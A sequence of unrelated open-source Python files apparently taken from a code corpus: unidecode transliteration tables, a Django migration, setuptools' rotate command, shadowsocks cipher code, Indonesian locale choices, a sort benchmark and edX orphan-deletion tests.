#number_of_points_for_circle1=122
row_vector=2
circle1=zeros((row_vector,number_of_points_for_circle1))
circle2=zeros((row_vector,number_of_points_for_circle2))
radius1=(number_of_points_for_circle1-2)/4
radius2=(number_of_points_for_circle2-2)/4
l2=len(circle2[0])
l1=len(circle1[0])
xmin_circle1=-1*radius1
xmax_circle1=radius1
xmin_circle2=-1*radius2
xmax_circle2=radius2
xrange_circle1=range(xmin_circle1,xmax_circle1+1)
xrange_circle1=xrange_circle1+xrange_circle1
xrange_circle2=range(xmin_circle2,xmax_circle2+1)
xrange_circle2=xrange_circle2+xrange_circle2
circle1[0][:]=xrange_circle1
circle2[0][:]=xrange_circle2
mat1=ones((1,number_of_points_for_circle1))
mat2=ones((1,number_of_points_for_circle2))
mat1=radius1*radius1*ones((1,number_of_points_for_circle1))
mat2=radius2*radius2*ones((1,number_of_points_for_circle2))
circle1[1][:]=mat1-(circle1[0][:]*circle1[0][:])
circle2[1][:]=mat2-(circle2[0][:]*circle2[0][:])
circle1[1][:]=[m.sqrt(circle1[1][i]) for i in range(0,number_of_points_for_circle1)]
circle1[1][(number_of_points_for_circle1/2):]=-1*circle1[1][(number_of_points_for_circle1/2):]
circle2[1][:]=[m.sqrt(circle2[1][i]) for i in range(0,number_of_points_for_circle2)]
circle2[1][(number_of_points_for_circle2/2):]=-1*circle2[1][(number_of_points_for_circle2/2):]
two_circles=hstack((circle1,circle2))
return two_circles
|
WillisXChen/django-oscar
|
refs/heads/master
|
oscar/lib/python2.7/site-packages/unidecode/x077.py
|
252
|
data = (
'Ming ', # 0x00
'Sheng ', # 0x01
'Shi ', # 0x02
'Yun ', # 0x03
'Mian ', # 0x04
'Pan ', # 0x05
'Fang ', # 0x06
'Miao ', # 0x07
'Dan ', # 0x08
'Mei ', # 0x09
'Mao ', # 0x0a
'Kan ', # 0x0b
'Xian ', # 0x0c
'Ou ', # 0x0d
'Shi ', # 0x0e
'Yang ', # 0x0f
'Zheng ', # 0x10
'Yao ', # 0x11
'Shen ', # 0x12
'Huo ', # 0x13
'Da ', # 0x14
'Zhen ', # 0x15
'Kuang ', # 0x16
'Ju ', # 0x17
'Shen ', # 0x18
'Chi ', # 0x19
'Sheng ', # 0x1a
'Mei ', # 0x1b
'Mo ', # 0x1c
'Zhu ', # 0x1d
'Zhen ', # 0x1e
'Zhen ', # 0x1f
'Mian ', # 0x20
'Di ', # 0x21
'Yuan ', # 0x22
'Die ', # 0x23
'Yi ', # 0x24
'Zi ', # 0x25
'Zi ', # 0x26
'Chao ', # 0x27
'Zha ', # 0x28
'Xuan ', # 0x29
'Bing ', # 0x2a
'Mi ', # 0x2b
'Long ', # 0x2c
'Sui ', # 0x2d
'Dong ', # 0x2e
'Mi ', # 0x2f
'Die ', # 0x30
'Yi ', # 0x31
'Er ', # 0x32
'Ming ', # 0x33
'Xuan ', # 0x34
'Chi ', # 0x35
'Kuang ', # 0x36
'Juan ', # 0x37
'Mou ', # 0x38
'Zhen ', # 0x39
'Tiao ', # 0x3a
'Yang ', # 0x3b
'Yan ', # 0x3c
'Mo ', # 0x3d
'Zhong ', # 0x3e
'Mai ', # 0x3f
'Zhao ', # 0x40
'Zheng ', # 0x41
'Mei ', # 0x42
'Jun ', # 0x43
'Shao ', # 0x44
'Han ', # 0x45
'Huan ', # 0x46
'Di ', # 0x47
'Cheng ', # 0x48
'Cuo ', # 0x49
'Juan ', # 0x4a
'E ', # 0x4b
'Wan ', # 0x4c
'Xian ', # 0x4d
'Xi ', # 0x4e
'Kun ', # 0x4f
'Lai ', # 0x50
'Jian ', # 0x51
'Shan ', # 0x52
'Tian ', # 0x53
'Hun ', # 0x54
'Wan ', # 0x55
'Ling ', # 0x56
'Shi ', # 0x57
'Qiong ', # 0x58
'Lie ', # 0x59
'Yai ', # 0x5a
'Jing ', # 0x5b
'Zheng ', # 0x5c
'Li ', # 0x5d
'Lai ', # 0x5e
'Sui ', # 0x5f
'Juan ', # 0x60
'Shui ', # 0x61
'Sui ', # 0x62
'Du ', # 0x63
'Bi ', # 0x64
'Bi ', # 0x65
'Mu ', # 0x66
'Hun ', # 0x67
'Ni ', # 0x68
'Lu ', # 0x69
'Yi ', # 0x6a
'Jie ', # 0x6b
'Cai ', # 0x6c
'Zhou ', # 0x6d
'Yu ', # 0x6e
'Hun ', # 0x6f
'Ma ', # 0x70
'Xia ', # 0x71
'Xing ', # 0x72
'Xi ', # 0x73
'Gun ', # 0x74
'Cai ', # 0x75
'Chun ', # 0x76
'Jian ', # 0x77
'Mei ', # 0x78
'Du ', # 0x79
'Hou ', # 0x7a
'Xuan ', # 0x7b
'Ti ', # 0x7c
'Kui ', # 0x7d
'Gao ', # 0x7e
'Rui ', # 0x7f
'Mou ', # 0x80
'Xu ', # 0x81
'Fa ', # 0x82
'Wen ', # 0x83
'Miao ', # 0x84
'Chou ', # 0x85
'Kui ', # 0x86
'Mi ', # 0x87
'Weng ', # 0x88
'Kou ', # 0x89
'Dang ', # 0x8a
'Chen ', # 0x8b
'Ke ', # 0x8c
'Sou ', # 0x8d
'Xia ', # 0x8e
'Qiong ', # 0x8f
'Mao ', # 0x90
'Ming ', # 0x91
'Man ', # 0x92
'Shui ', # 0x93
'Ze ', # 0x94
'Zhang ', # 0x95
'Yi ', # 0x96
'Diao ', # 0x97
'Ou ', # 0x98
'Mo ', # 0x99
'Shun ', # 0x9a
'Cong ', # 0x9b
'Lou ', # 0x9c
'Chi ', # 0x9d
'Man ', # 0x9e
'Piao ', # 0x9f
'Cheng ', # 0xa0
'Ji ', # 0xa1
'Meng ', # 0xa2
'[?] ', # 0xa3
'Run ', # 0xa4
'Pie ', # 0xa5
'Xi ', # 0xa6
'Qiao ', # 0xa7
'Pu ', # 0xa8
'Zhu ', # 0xa9
'Deng ', # 0xaa
'Shen ', # 0xab
'Shun ', # 0xac
'Liao ', # 0xad
'Che ', # 0xae
'Xian ', # 0xaf
'Kan ', # 0xb0
'Ye ', # 0xb1
'Xu ', # 0xb2
'Tong ', # 0xb3
'Mou ', # 0xb4
'Lin ', # 0xb5
'Kui ', # 0xb6
'Xian ', # 0xb7
'Ye ', # 0xb8
'Ai ', # 0xb9
'Hui ', # 0xba
'Zhan ', # 0xbb
'Jian ', # 0xbc
'Gu ', # 0xbd
'Zhao ', # 0xbe
'Qu ', # 0xbf
'Wei ', # 0xc0
'Chou ', # 0xc1
'Sao ', # 0xc2
'Ning ', # 0xc3
'Xun ', # 0xc4
'Yao ', # 0xc5
'Huo ', # 0xc6
'Meng ', # 0xc7
'Mian ', # 0xc8
'Bin ', # 0xc9
'Mian ', # 0xca
'Li ', # 0xcb
'Kuang ', # 0xcc
'Jue ', # 0xcd
'Xuan ', # 0xce
'Mian ', # 0xcf
'Huo ', # 0xd0
'Lu ', # 0xd1
'Meng ', # 0xd2
'Long ', # 0xd3
'Guan ', # 0xd4
'Man ', # 0xd5
'Xi ', # 0xd6
'Chu ', # 0xd7
'Tang ', # 0xd8
'Kan ', # 0xd9
'Zhu ', # 0xda
'Mao ', # 0xdb
'Jin ', # 0xdc
'Lin ', # 0xdd
'Yu ', # 0xde
'Shuo ', # 0xdf
'Ce ', # 0xe0
'Jue ', # 0xe1
'Shi ', # 0xe2
'Yi ', # 0xe3
'Shen ', # 0xe4
'Zhi ', # 0xe5
'Hou ', # 0xe6
'Shen ', # 0xe7
'Ying ', # 0xe8
'Ju ', # 0xe9
'Zhou ', # 0xea
'Jiao ', # 0xeb
'Cuo ', # 0xec
'Duan ', # 0xed
'Ai ', # 0xee
'Jiao ', # 0xef
'Zeng ', # 0xf0
'Huo ', # 0xf1
'Bai ', # 0xf2
'Shi ', # 0xf3
'Ding ', # 0xf4
'Qi ', # 0xf5
'Ji ', # 0xf6
'Zi ', # 0xf7
'Gan ', # 0xf8
'Wu ', # 0xf9
'Tuo ', # 0xfa
'Ku ', # 0xfb
'Qiang ', # 0xfc
'Xi ', # 0xfd
'Fan ', # 0xfe
'Kuang ', # 0xff
)
|
AlexStarov/Shop
|
refs/heads/master
|
applications/cart/migrations/0005_auto_20170107_2248.py
|
1
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cart', '0004_auto_20170102_2258'),
]
operations = [
migrations.AddField(
model_name='order',
name='custom_order_sum',
field=models.PositiveIntegerField(null=True, verbose_name='\u0421\u0443\u043c\u043c\u0430 \u0437\u0430\u043a\u0430\u0437\u0430 \u0432 \u0440\u0443\u0447\u043d\u0443\u044e', blank=True),
),
migrations.AddField(
model_name='product',
name='custom_price',
field=models.BooleanField(default=False, verbose_name='\u0426\u0435\u043d\u0430 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u0430\u044f \u0432 \u0440\u0443\u0447\u043d\u0443\u044e'),
),
]
|
IRI-Research/django-templatetag-sugar
|
refs/heads/master
|
templatetag_sugar/__init__.py
|
17
|
__version__ = "1.0.1"
|
tkingless/webtesting
|
refs/heads/master
|
venvs/dev/lib/python2.7/site-packages/setuptools/command/rotate.py
|
389
|
from distutils.util import convert_path
from distutils import log
from distutils.errors import DistutilsOptionError
import os
import shutil
from setuptools.extern import six
from setuptools import Command
class rotate(Command):
"""Delete older distributions"""
description = "delete older distributions, keeping N newest files"
user_options = [
('match=', 'm', "patterns to match (required)"),
('dist-dir=', 'd', "directory where the distributions are"),
('keep=', 'k', "number of matching distributions to keep"),
]
boolean_options = []
def initialize_options(self):
self.match = None
self.dist_dir = None
self.keep = None
def finalize_options(self):
if self.match is None:
raise DistutilsOptionError(
"Must specify one or more (comma-separated) match patterns "
"(e.g. '.zip' or '.egg')"
)
if self.keep is None:
raise DistutilsOptionError("Must specify number of files to keep")
try:
self.keep = int(self.keep)
except ValueError:
raise DistutilsOptionError("--keep must be an integer")
if isinstance(self.match, six.string_types):
self.match = [
convert_path(p.strip()) for p in self.match.split(',')
]
self.set_undefined_options('bdist', ('dist_dir', 'dist_dir'))
def run(self):
self.run_command("egg_info")
from glob import glob
for pattern in self.match:
pattern = self.distribution.get_name() + '*' + pattern
files = glob(os.path.join(self.dist_dir, pattern))
files = [(os.path.getmtime(f), f) for f in files]
files.sort()
files.reverse()
log.info("%d file(s) matching %s", len(files), pattern)
files = files[self.keep:]
for (t, f) in files:
log.info("Deleting %s", f)
if not self.dry_run:
if os.path.isdir(f):
shutil.rmtree(f)
else:
os.unlink(f)
|
shliujing/shadowsocks
|
refs/heads/master
|
shadowsocks/encrypt.py
|
4
|
#!/usr/bin/env python
# Copyright (c) 2014 clowwindy
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import, division, print_function, \
with_statement
import os
import sys
import hashlib
import logging
from shadowsocks.crypto import m2, rc4_md5, salsa20_ctr,\
ctypes_openssl, ctypes_libsodium, table
method_supported = {}
method_supported.update(rc4_md5.ciphers)
method_supported.update(salsa20_ctr.ciphers)
method_supported.update(ctypes_openssl.ciphers)
method_supported.update(ctypes_libsodium.ciphers)
# let M2Crypto override ctypes_openssl
method_supported.update(m2.ciphers)
method_supported.update(table.ciphers)
def random_string(length):
try:
import M2Crypto.Rand
return M2Crypto.Rand.rand_bytes(length)
except ImportError:
return os.urandom(length)
cached_keys = {}
def try_cipher(key, method=None):
Encryptor(key, method)
def EVP_BytesToKey(password, key_len, iv_len):
# equivalent to OpenSSL's EVP_BytesToKey() with count 1
# so that we make the same key and iv as nodejs version
if hasattr(password, 'encode'):
password = password.encode('utf-8')
cached_key = '%s-%d-%d' % (password, key_len, iv_len)
r = cached_keys.get(cached_key, None)
if r:
return r
m = []
i = 0
while len(b''.join(m)) < (key_len + iv_len):
md5 = hashlib.md5()
data = password
if i > 0:
data = m[i - 1] + password
md5.update(data)
m.append(md5.digest())
i += 1
ms = b''.join(m)
key = ms[:key_len]
iv = ms[key_len:key_len + iv_len]
cached_keys[cached_key] = (key, iv)
return key, iv
class Encryptor(object):
def __init__(self, key, method):
self.key = key
self.method = method
self.iv = None
self.iv_sent = False
self.cipher_iv = b''
self.decipher = None
method = method.lower()
self._method_info = self.get_method_info(method)
if self._method_info:
self.cipher = self.get_cipher(key, method, 1,
random_string(self._method_info[1]))
else:
logging.error('method %s not supported' % method)
sys.exit(1)
def get_method_info(self, method):
method = method.lower()
m = method_supported.get(method)
return m
def iv_len(self):
return len(self.cipher_iv)
def get_cipher(self, password, method, op, iv):
if hasattr(password, 'encode'):
password = password.encode('utf-8')
m = self._method_info
if m[0] > 0:
key, iv_ = EVP_BytesToKey(password, m[0], m[1])
else:
# key_length == 0 indicates we should use the key directly
key, iv = password, b''
iv = iv[:m[1]]
if op == 1:
# this iv is for cipher not decipher
self.cipher_iv = iv[:m[1]]
return m[2](method, key, iv, op)
def encrypt(self, buf):
if len(buf) == 0:
return buf
if self.iv_sent:
return self.cipher.update(buf)
else:
self.iv_sent = True
return self.cipher_iv + self.cipher.update(buf)
def decrypt(self, buf):
if len(buf) == 0:
return buf
if self.decipher is None:
decipher_iv_len = self._method_info[1]
decipher_iv = buf[:decipher_iv_len]
self.decipher = self.get_cipher(self.key, self.method, 0,
iv=decipher_iv)
buf = buf[decipher_iv_len:]
if len(buf) == 0:
return buf
return self.decipher.update(buf)
def encrypt_all(password, method, op, data):
result = []
method = method.lower()
(key_len, iv_len, m) = method_supported[method]
if key_len > 0:
key, _ = EVP_BytesToKey(password, key_len, iv_len)
else:
key = password
if op:
iv = random_string(iv_len)
result.append(iv)
else:
iv = data[:iv_len]
data = data[iv_len:]
cipher = m(method, key, iv, op)
result.append(cipher.update(data))
return b''.join(result)
CIPHERS_TO_TEST = [
b'aes-128-cfb',
b'aes-256-cfb',
b'rc4-md5',
b'salsa20',
b'chacha20',
b'table',
]
def test_encryptor():
from os import urandom
plain = urandom(10240)
for method in CIPHERS_TO_TEST:
logging.warn(method)
encryptor = Encryptor(b'key', method)
decryptor = Encryptor(b'key', method)
cipher = encryptor.encrypt(plain)
plain2 = decryptor.decrypt(cipher)
assert plain == plain2
def test_encrypt_all():
from os import urandom
plain = urandom(10240)
for method in CIPHERS_TO_TEST:
logging.warn(method)
cipher = encrypt_all(b'key', method, 1, plain)
plain2 = encrypt_all(b'key', method, 0, cipher)
assert plain == plain2
if __name__ == '__main__':
test_encrypt_all()
test_encryptor()
|
2013Commons/HUE-SHARK
|
refs/heads/master
|
desktop/core/ext-py/Django-1.2.3/build/lib.linux-i686-2.7/django/contrib/localflavor/id/id_choices.py
|
65
|
from django.utils.translation import ugettext_lazy as _
# Reference: http://id.wikipedia.org/wiki/Daftar_provinsi_Indonesia
# Indonesia does not have an official Province code standard.
# I decided to use unambiguous and consistent (some are common) 3-letter codes.
PROVINCE_CHOICES = (
('BLI', _('Bali')),
('BTN', _('Banten')),
('BKL', _('Bengkulu')),
('DIY', _('Yogyakarta')),
('JKT', _('Jakarta')),
('GOR', _('Gorontalo')),
('JMB', _('Jambi')),
('JBR', _('Jawa Barat')),
('JTG', _('Jawa Tengah')),
('JTM', _('Jawa Timur')),
('KBR', _('Kalimantan Barat')),
('KSL', _('Kalimantan Selatan')),
('KTG', _('Kalimantan Tengah')),
('KTM', _('Kalimantan Timur')),
('BBL', _('Kepulauan Bangka-Belitung')),
('KRI', _('Kepulauan Riau')),
('LPG', _('Lampung')),
('MLK', _('Maluku')),
('MUT', _('Maluku Utara')),
('NAD', _('Nanggroe Aceh Darussalam')),
('NTB', _('Nusa Tenggara Barat')),
('NTT', _('Nusa Tenggara Timur')),
('PPA', _('Papua')),
('PPB', _('Papua Barat')),
('RIU', _('Riau')),
('SLB', _('Sulawesi Barat')),
('SLS', _('Sulawesi Selatan')),
('SLT', _('Sulawesi Tengah')),
('SLR', _('Sulawesi Tenggara')),
('SLU', _('Sulawesi Utara')),
('SMB', _('Sumatera Barat')),
('SMS', _('Sumatera Selatan')),
('SMU', _('Sumatera Utara')),
)
LICENSE_PLATE_PREFIX_CHOICES = (
('A', _('Banten')),
('AA', _('Magelang')),
('AB', _('Yogyakarta')),
('AD', _('Surakarta - Solo')),
('AE', _('Madiun')),
('AG', _('Kediri')),
('B', _('Jakarta')),
('BA', _('Sumatera Barat')),
('BB', _('Tapanuli')),
('BD', _('Bengkulu')),
('BE', _('Lampung')),
('BG', _('Sumatera Selatan')),
('BH', _('Jambi')),
('BK', _('Sumatera Utara')),
('BL', _('Nanggroe Aceh Darussalam')),
('BM', _('Riau')),
('BN', _('Kepulauan Bangka Belitung')),
('BP', _('Kepulauan Riau')),
('CC', _('Corps Consulate')),
('CD', _('Corps Diplomatic')),
('D', _('Bandung')),
('DA', _('Kalimantan Selatan')),
('DB', _('Sulawesi Utara Daratan')),
('DC', _('Sulawesi Barat')),
('DD', _('Sulawesi Selatan')),
('DE', _('Maluku')),
('DG', _('Maluku Utara')),
('DH', _('NTT - Timor')),
('DK', _('Bali')),
('DL', _('Sulawesi Utara Kepulauan')),
('DM', _('Gorontalo')),
('DN', _('Sulawesi Tengah')),
('DR', _('NTB - Lombok')),
('DS', _('Papua dan Papua Barat')),
('DT', _('Sulawesi Tenggara')),
('E', _('Cirebon')),
('EA', _('NTB - Sumbawa')),
('EB', _('NTT - Flores')),
('ED', _('NTT - Sumba')),
('F', _('Bogor')),
('G', _('Pekalongan')),
('H', _('Semarang')),
('K', _('Pati')),
('KB', _('Kalimantan Barat')),
('KH', _('Kalimantan Tengah')),
('KT', _('Kalimantan Timur')),
('L', _('Surabaya')),
('M', _('Madura')),
('N', _('Malang')),
('P', _('Jember')),
('R', _('Banyumas')),
('RI', _('Federal Government')),
('S', _('Bojonegoro')),
('T', _('Purwakarta')),
('W', _('Sidoarjo')),
('Z', _('Garut')),
)
|
beiko-lab/gengis
|
refs/heads/master
|
bin/Lib/test/sortperf.py
|
14
|
"""Sort performance test.
See main() for command line syntax.
See tabulate() for output format.
"""
import sys
import time
import random
import marshal
import tempfile
import os
td = tempfile.gettempdir()
def randfloats(n):
"""Return a list of n random floats in [0, 1)."""
# Generating floats is expensive, so this writes them out to a file in
# a temp directory. If the file already exists, it just reads them
# back in and shuffles them a bit.
fn = os.path.join(td, "rr%06d" % n)
try:
fp = open(fn, "rb")
except IOError:
r = random.random
result = [r() for i in xrange(n)]
try:
try:
fp = open(fn, "wb")
marshal.dump(result, fp)
fp.close()
fp = None
finally:
if fp:
try:
os.unlink(fn)
except os.error:
pass
except IOError, msg:
print "can't write", fn, ":", msg
else:
result = marshal.load(fp)
fp.close()
# Shuffle it a bit...
for i in range(10):
i = random.randrange(n)
temp = result[:i]
del result[:i]
temp.reverse()
result.extend(temp)
del temp
assert len(result) == n
return result
def flush():
sys.stdout.flush()
def doit(L):
t0 = time.clock()
L.sort()
t1 = time.clock()
print "%6.2f" % (t1-t0),
flush()
def tabulate(r):
"""Tabulate sort speed for lists of various sizes.
The sizes are 2**i for i in r (the argument, a list).
The output displays i, 2**i, and the time to sort arrays of 2**i
floating point numbers with the following properties:
*sort: random data
\sort: descending data
/sort: ascending data
3sort: ascending, then 3 random exchanges
+sort: ascending, then 10 random at the end
%sort: ascending, then randomly replace 1% of the elements w/ random values
~sort: many duplicates
=sort: all equal
!sort: worst case scenario
"""
cases = tuple([ch + "sort" for ch in r"*\/3+%~=!"])
fmt = ("%2s %7s" + " %6s"*len(cases))
print fmt % (("i", "2**i") + cases)
for i in r:
n = 1 << i
L = randfloats(n)
print "%2d %7d" % (i, n),
flush()
doit(L) # *sort
L.reverse()
doit(L) # \sort
doit(L) # /sort
# Do 3 random exchanges.
for dummy in range(3):
i1 = random.randrange(n)
i2 = random.randrange(n)
L[i1], L[i2] = L[i2], L[i1]
doit(L) # 3sort
# Replace the last 10 with random floats.
if n >= 10:
L[-10:] = [random.random() for dummy in range(10)]
doit(L) # +sort
# Replace 1% of the elements at random.
for dummy in xrange(n // 100):
L[random.randrange(n)] = random.random()
doit(L) # %sort
# Arrange for lots of duplicates.
if n > 4:
del L[4:]
L = L * (n // 4)
# Force the elements to be distinct objects, else timings can be
# artificially low.
L = map(lambda x: --x, L)
doit(L) # ~sort
del L
# All equal. Again, force the elements to be distinct objects.
L = map(abs, [-0.5] * n)
doit(L) # =sort
del L
# This one looks like [3, 2, 1, 0, 0, 1, 2, 3]. It was a bad case
# for an older implementation of quicksort, which used the median
# of the first, last and middle elements as the pivot.
half = n // 2
L = range(half - 1, -1, -1)
L.extend(range(half))
# Force to float, so that the timings are comparable. This is
# significantly faster if we leave tham as ints.
L = map(float, L)
doit(L) # !sort
print
def main():
"""Main program when invoked as a script.
One argument: tabulate a single row.
Two arguments: tabulate a range (inclusive).
Extra arguments are used to seed the random generator.
"""
# default range (inclusive)
k1 = 15
k2 = 20
if sys.argv[1:]:
# one argument: single point
k1 = k2 = int(sys.argv[1])
if sys.argv[2:]:
# two arguments: specify range
k2 = int(sys.argv[2])
if sys.argv[3:]:
# derive random seed from remaining arguments
x = 1
for a in sys.argv[3:]:
x = 69069 * x + hash(a)
random.seed(x)
r = range(k1, k2+1) # include the end point
tabulate(r)
if __name__ == '__main__':
main()
|
pabloborrego93/edx-platform
|
refs/heads/master
|
cms/djangoapps/contentstore/management/commands/tests/test_delete_orphans.py
|
86
|
"""Tests running the delete_orphan command"""
import ddt
from django.core.management import call_command, CommandError
from contentstore.tests.test_orphan import TestOrphanBase
from xmodule.modulestore.tests.factories import CourseFactory
from xmodule.modulestore import ModuleStoreEnum
@ddt.ddt
class TestDeleteOrphan(TestOrphanBase):
"""
Tests for running the delete_orphan management command.
Inherits from TestOrphan in order to use its setUp method.
"""
def test_no_args(self):
"""
Test delete_orphans command with no arguments
"""
with self.assertRaisesRegexp(CommandError, 'Error: too few arguments'):
call_command('delete_orphans')
@ddt.data(ModuleStoreEnum.Type.split, ModuleStoreEnum.Type.mongo)
def test_delete_orphans_no_commit(self, default_store):
"""
Tests that running the command without a '--commit' argument
results in no orphans being deleted
"""
course = self.create_course_with_orphans(default_store)
call_command('delete_orphans', unicode(course.id))
self.assertTrue(self.store.has_item(course.id.make_usage_key('html', 'multi_parent_html')))
self.assertTrue(self.store.has_item(course.id.make_usage_key('vertical', 'OrphanVert')))
self.assertTrue(self.store.has_item(course.id.make_usage_key('chapter', 'OrphanChapter')))
self.assertTrue(self.store.has_item(course.id.make_usage_key('html', 'OrphanHtml')))
@ddt.data(ModuleStoreEnum.Type.split, ModuleStoreEnum.Type.mongo)
def test_delete_orphans_commit(self, default_store):
"""
Tests that running the command WITH the '--commit' argument
results in the orphans being deleted
"""
course = self.create_course_with_orphans(default_store)
call_command('delete_orphans', unicode(course.id), '--commit')
# make sure this module wasn't deleted
self.assertTrue(self.store.has_item(course.id.make_usage_key('html', 'multi_parent_html')))
# and make sure that these were
self.assertFalse(self.store.has_item(course.id.make_usage_key('vertical', 'OrphanVert')))
self.assertFalse(self.store.has_item(course.id.make_usage_key('chapter', 'OrphanChapter')))
self.assertFalse(self.store.has_item(course.id.make_usage_key('html', 'OrphanHtml')))
def test_delete_orphans_published_branch_split(self):
"""
Tests that if there are orphans only on the published branch,
running delete orphans with a course key that specifies
the published branch will delete the published orphan
"""
course, orphan = self.create_split_course_with_published_orphan()
published_branch = course.id.for_branch(ModuleStoreEnum.BranchName.published)
items_in_published = self.store.get_items(published_branch)
items_in_draft_preferred = self.store.get_items(course.id)
# call delete orphans, specifying the published branch
# of the course
call_command('delete_orphans', unicode(published_branch), '--commit')
# now all orphans should be deleted
self.assertOrphanCount(course.id, 0)
self.assertOrphanCount(published_branch, 0)
self.assertNotIn(orphan, self.store.get_items(published_branch))
# we should have one fewer item in the published branch of the course
self.assertEqual(
len(items_in_published) - 1,
len(self.store.get_items(published_branch)),
)
# and the same amount of items in the draft branch of the course
self.assertEqual(
len(items_in_draft_preferred),
len(self.store.get_items(course.id)),
)
def create_split_course_with_published_orphan(self):
"""
Helper to create a split course with a published orphan
"""
course = CourseFactory.create(default_store=ModuleStoreEnum.Type.split)
# create an orphan
orphan = self.store.create_item(
self.user.id, course.id, 'html', "PublishedOnlyOrphan"
)
self.store.publish(orphan.location, self.user.id)
# grab the published branch of the course
published_branch = course.id.for_branch(
ModuleStoreEnum.BranchName.published
)
# assert that this orphan is present in both branches
self.assertOrphanCount(course.id, 1)
self.assertOrphanCount(published_branch, 1)
# delete this orphan from the draft branch without
# auto-publishing this change to the published branch
self.store.delete_item(
orphan.location, self.user.id, skip_auto_publish=True
)
# now there should be no orphans in the draft branch, but
# there should be one in published
self.assertOrphanCount(course.id, 0)
self.assertOrphanCount(published_branch, 1)
self.assertIn(orphan, self.store.get_items(published_branch))
return course, orphan
|
justinpotts/mozillians
|
refs/heads/master
|
vendor-local/lib/python/unidecode/x024.py
|
118
|
data = (
'', # 0x00
'', # 0x01
'', # 0x02
'', # 0x03
'', # 0x04
'', # 0x05
'', # 0x06
'', # 0x07
'', # 0x08
'', # 0x09
'', # 0x0a
'', # 0x0b
'', # 0x0c
'', # 0x0d
'', # 0x0e
'', # 0x0f
'', # 0x10
'', # 0x11
'', # 0x12
'', # 0x13
'', # 0x14
'', # 0x15
'', # 0x16
'', # 0x17
'', # 0x18
'', # 0x19
'', # 0x1a
'', # 0x1b
'', # 0x1c
'', # 0x1d
'', # 0x1e
'', # 0x1f
'', # 0x20
'', # 0x21
'', # 0x22
'', # 0x23
'', # 0x24
'', # 0x25
'', # 0x26
'[?]', # 0x27
'[?]', # 0x28
'[?]', # 0x29
'[?]', # 0x2a
'[?]', # 0x2b
'[?]', # 0x2c
'[?]', # 0x2d
'[?]', # 0x2e
'[?]', # 0x2f
'[?]', # 0x30
'[?]', # 0x31
'[?]', # 0x32
'[?]', # 0x33
'[?]', # 0x34
'[?]', # 0x35
'[?]', # 0x36
'[?]', # 0x37
'[?]', # 0x38
'[?]', # 0x39
'[?]', # 0x3a
'[?]', # 0x3b
'[?]', # 0x3c
'[?]', # 0x3d
'[?]', # 0x3e
'[?]', # 0x3f
'', # 0x40
'', # 0x41
'', # 0x42
'', # 0x43
'', # 0x44
'', # 0x45
'', # 0x46
'', # 0x47
'', # 0x48
'', # 0x49
'', # 0x4a
'[?]', # 0x4b
'[?]', # 0x4c
'[?]', # 0x4d
'[?]', # 0x4e
'[?]', # 0x4f
'[?]', # 0x50
'[?]', # 0x51
'[?]', # 0x52
'[?]', # 0x53
'[?]', # 0x54
'[?]', # 0x55
'[?]', # 0x56
'[?]', # 0x57
'[?]', # 0x58
'[?]', # 0x59
'[?]', # 0x5a
'[?]', # 0x5b
'[?]', # 0x5c
'[?]', # 0x5d
'[?]', # 0x5e
'[?]', # 0x5f
'1', # 0x60
'2', # 0x61
'3', # 0x62
'4', # 0x63
'5', # 0x64
'6', # 0x65
'7', # 0x66
'8', # 0x67
'9', # 0x68
'10', # 0x69
'11', # 0x6a
'12', # 0x6b
'13', # 0x6c
'14', # 0x6d
'15', # 0x6e
'16', # 0x6f
'17', # 0x70
'18', # 0x71
'19', # 0x72
'20', # 0x73
'(1)', # 0x74
'(2)', # 0x75
'(3)', # 0x76
'(4)', # 0x77
'(5)', # 0x78
'(6)', # 0x79
'(7)', # 0x7a
'(8)', # 0x7b
'(9)', # 0x7c
'(10)', # 0x7d
'(11)', # 0x7e
'(12)', # 0x7f
'(13)', # 0x80
'(14)', # 0x81
'(15)', # 0x82
'(16)', # 0x83
'(17)', # 0x84
'(18)', # 0x85
'(19)', # 0x86
'(20)', # 0x87
'1.', # 0x88
'2.', # 0x89
'3.', # 0x8a
'4.', # 0x8b
'5.', # 0x8c
'6.', # 0x8d
'7.', # 0x8e
'8.', # 0x8f
'9.', # 0x90
'10.', # 0x91
'11.', # 0x92
'12.', # 0x93
'13.', # 0x94
'14.', # 0x95
'15.', # 0x96
'16.', # 0x97
'17.', # 0x98
'18.', # 0x99
'19.', # 0x9a
'20.', # 0x9b
'(a)', # 0x9c
'(b)', # 0x9d
'(c)', # 0x9e
'(d)', # 0x9f
'(e)', # 0xa0
'(f)', # 0xa1
'(g)', # 0xa2
'(h)', # 0xa3
'(i)', # 0xa4
'(j)', # 0xa5
'(k)', # 0xa6
'(l)', # 0xa7
'(m)', # 0xa8
'(n)', # 0xa9
'(o)', # 0xaa
'(p)', # 0xab
'(q)', # 0xac
'(r)', # 0xad
'(s)', # 0xae
'(t)', # 0xaf
'(u)', # 0xb0
'(v)', # 0xb1
'(w)', # 0xb2
'(x)', # 0xb3
'(y)', # 0xb4
'(z)', # 0xb5
'a', # 0xb6
'b', # 0xb7
'c', # 0xb8
'd', # 0xb9
'e', # 0xba
'f', # 0xbb
'g', # 0xbc
'h', # 0xbd
'i', # 0xbe
'j', # 0xbf
'k', # 0xc0
'l', # 0xc1
'm', # 0xc2
'n', # 0xc3
'o', # 0xc4
'p', # 0xc5
'q', # 0xc6
'r', # 0xc7
's', # 0xc8
't', # 0xc9
'u', # 0xca
'v', # 0xcb
